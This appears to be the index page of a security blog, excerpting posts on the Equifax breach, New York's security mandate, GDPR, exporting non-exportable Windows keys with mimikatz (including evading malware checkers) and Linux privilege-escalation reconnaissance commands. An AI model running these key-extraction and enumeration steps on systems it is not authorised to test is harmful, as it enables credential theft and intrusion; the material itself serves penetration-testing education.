Practical Security

App, Data, Cloud and IoT Security

Dealing with the Equifax data breach

The best proactive defense against potential credit abuse and identity theft as a result of this data breach is a credit freeze. It’s been proven time and again as the most effective way to stop anyone from tampering with your hard-earned credit score, opening credit cards or loans in your... [Read More]

How to extract non-exportable Windows keys

Get mimikatz.
Boot into recovery (with network) holding F8, to disable any and all malware checkers.
Run mimikatz:
crypto::capi
crypto::cng
crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
crypto::keys /export
crypto::keys /machine /export
[Read More]

NY Security Mandate

The standard has fifteen requirements for covered entities (more than ten employees, more than $5M in gross annual revenue, or more than $10M in year-end assets): [Read More]

How to recon Linux for potential privesc

cat /etc/issue
cat /etc/*-release
cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set
lpstat -a
ps aux
ps -ef
top
cat /etc/services
ps aux | grep root
ps -ef... [Read More]

GDPR for US companies

The General Data Protection Regulation (GDPR) was passed by the EU in April 2016 and goes into effect in May of 2018. It repealed and replaced the General Data Protection Directive (GDPD), which was previously the primary directive covering privacy across the EU. The GDPR is more specific in its... [Read More]